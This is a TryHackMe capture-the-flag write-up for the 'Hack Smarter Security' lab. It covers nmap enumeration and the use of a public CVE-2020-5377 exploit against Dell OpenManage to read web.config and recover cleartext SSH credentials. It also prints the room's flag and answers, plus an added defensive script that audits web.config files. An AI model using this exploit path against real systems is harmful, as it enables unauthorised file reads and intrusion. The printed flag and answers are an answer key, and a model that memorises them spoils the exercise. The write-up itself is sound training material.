TryHackMe: Hack Smarter Security | Q&A

Mohamed Ali
3 min read · Jul 14, 2024


Your mission is to infiltrate the web server of the notorious Hack Smarter APT (Advanced Persistent Threat) group. This group is known for conducting malicious cyber activities, and it’s imperative that we gather intel on their upcoming targets.

LINK: Hack Smarter Security

Enumeration

nmap -sV -sC -T4 10.10.136.190

Starting Nmap 7.80 ( https://nmap.org ) at 2024-07-14 14:49 EEST
Nmap scan report for 10.10.136.190
Host is up (0.47s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-28-23 02:58PM 3722 Credit-Cards-We-Pwned.txt
|_06-28-23 03:00PM 1022126 stolen-passport.png
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 0d:fa:da:de:c9:dd:99:8d:2e:8e:eb:3b:93:ff:e2:6c (RSA)
| 256 5d:0c:df:32:26:d3:71:a2:8e:6e:9a:1c:43:fc:1a:03 (ECDSA)
|_ 256 c4:25:e7:09:d6:c9:d9:86:5f:6e:8a:8b:ec:13:4a:8b (ED25519)
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HackSmarterSec
1311/tcp open ssl/rxmon?
| ssl-cert: Subject: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Not valid before: 2023-06-30T19:03:17
|_Not valid after: 2025-06-29T19:03:17
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HACKSMARTERSEC
| NetBIOS_Domain_Name: HACKSMARTERSEC
| NetBIOS_Computer_Name: HACKSMARTERSEC
| DNS_Domain_Name: hacksmartersec
| DNS_Computer_Name: hacksmartersec
| Product_Version: 10.0.17763
|_ System_Time: 2024-07-14T11:50:24+00:00
| ssl-cert: Subject: commonName=hacksmartersec
| Not valid before: 2024-07-13T11:29:18
|_Not valid after: 2025-01-12T11:29:18
|_ssl-date: 2024-07-14T11:50:35+00:00; -1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.92 seconds

The scan revealed that our target is a Windows machine, and we found 5 open ports.

We also discovered that FTP anonymous login was enabled but didn’t find anything useful in the files.

Moving on, we checked the website running on port 80, which turned out to be IIS 10.0. However, our attempts to find interesting files or directories were unsuccessful.

Next, we checked port 1311, where we found Dell OpenManage version 9.4.0.2 running.

  • After digging deeper, we learned that this version is vulnerable to CVE-2020-5377, an arbitrary file read.
  • I found this exploit that will help us read files on the target.
  • A quick search reveals that the root folder for the IIS default website is located at C:\inetpub\wwwroot. The idea here is to try to read the web.config file, an XML file containing rules for a particular site on the web server. This file may contain credentials.
python3 CVE-2020-5377.py <attacker IP> <target IP>:<target port>

Flags :

Based on the title of the web server on port 80, which is hacksmartersec, I assumed that the web.config file is located at C:\inetpub\wwwroot\hacksmartersec\web.config.

# python3 CVE-2020-5377.py <attacker IP> <target IP>:<target port>
Session: 899463F99DD6BFF20E8FDE06E7F53860
VID:
1E24CB0C500059F5
10.10.57.249:1311
file > C:\inetpub\wwwroot\HackSmarterSec\web.config
Reading contents of C:\inetpub\wwwroot\HackSmarterSec\web.config:
<configuration>
<appSettings>
<add key="Username" value="tyler" />
<add key="Password" value="IAmA1337h4x0randIknowit!" />
</appSettings>
<location path="web.config">
<system.webServer>
<security>
<authorization>
<deny users="*"
</authorization>
</security>
</system.webServer>
</location>
</configuration>

Now that we have the credentials, our next step is to log in via SSH and get the user flag.

SSH login credentials:
Username : tyler
Password : IAmA1337h4x0randIknowit!
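
The web.config above kept the SSH credentials in cleartext under appSettings, and its deny rule did not stop the file from being read through port 1311. As an added example (not part of the original write-up), this Python audit flags that pattern in a web.config; the function name, the key-name heuristics and the sample file are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Assumed heuristics: names that usually hold credentials.
SECRET_NAME = re.compile(r"pass(word|wd)?|pwd|secret|token|api[-_]?key", re.I)
CONN_PASSWORD = re.compile(r"\b(password|pwd)\s*=\s*[^;]+", re.I)

def audit_web_config(xml_text):
    """Return (section, name, reason) tuples for cleartext secrets."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [("file", "", f"not well-formed XML, review by hand: {exc}")]
    findings = []
    for add in root.findall(".//appSettings/add"):
        key, value = add.get("key", ""), add.get("value", "")
        if SECRET_NAME.search(key) and value:
            findings.append(("appSettings", key, "cleartext secret value"))
    for add in root.findall(".//connectionStrings/add"):
        if CONN_PASSWORD.search(add.get("connectionString", "")):
            findings.append(("connectionStrings", add.get("name", ""),
                             "password embedded in connection string"))
    # URL authorization only covers requests served by IIS itself.
    for loc in root.findall(".//location"):
        if loc.find(".//authorization/deny") is not None and findings:
            findings.append(("location", loc.get("path", ""),
                             "deny rule does not protect the file on disk"))
    return findings

# Constructed sample, not the file from the room; values are placeholders.
SAMPLE = """<configuration>
  <appSettings>
    <add key="Username" value="svc-web" />
    <add key="Password" value="PLACEHOLDER" />
    <add key="Theme" value="dark" />
  </appSettings>
  <connectionStrings>
    <add name="Main" connectionString="Server=db;User Id=app;Password=PLACEHOLDER;" />
  </connectionStrings>
  <location path="web.config">
    <system.webServer><security><authorization>
      <deny users="*" />
    </authorization></security></system.webServer>
  </location>
</configuration>"""

if __name__ == "__main__":
    for section, name, reason in audit_web_config(SAMPLE):
        print(f"{section:18} {name:12} {reason}")
```

Sections encrypted with ASP.NET protected configuration contain no readable add elements, so they produce no findings.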

Q : What is user.txt?

A: THM{4ll15n0tw3llw1thd3ll}

Q : Which organizations is the Hack Smarter group targeting next?

A : CyberLens, WorkSmarter, SteelMountain
